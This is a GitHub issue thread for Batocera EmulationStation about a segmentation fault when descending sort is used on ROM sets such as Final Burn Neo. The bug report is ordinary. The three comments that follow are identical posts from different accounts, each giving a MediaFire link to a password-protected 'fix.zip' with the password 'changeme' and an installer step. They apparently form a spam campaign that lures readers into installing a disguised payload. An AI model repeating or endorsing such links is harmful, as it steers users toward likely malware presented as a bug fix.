### ISSUE TITLE
Descending Sort Causes Crashes for Certain Metadata

### ISSUE THREAD

**Issue by navy1978** [batocera-linux/batocera-emulationstation#1769]
### Concerned project

Batocera

### Architecture

Anbernic handled devices (ARM)

### Issue description

We’re encountering an unusual issue that occurs specifically with certain datasets, such as the Final Burn Neo ROM set. This issue affects all descending sort filters, except for filename and sort name, which remain unaffected.

When attempting to perform a descending sort, the system crashes with a segmentation fault. 

The issue appears to be related to the "getChildrenListToDisplay" method in the "FileData.cpp" class.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
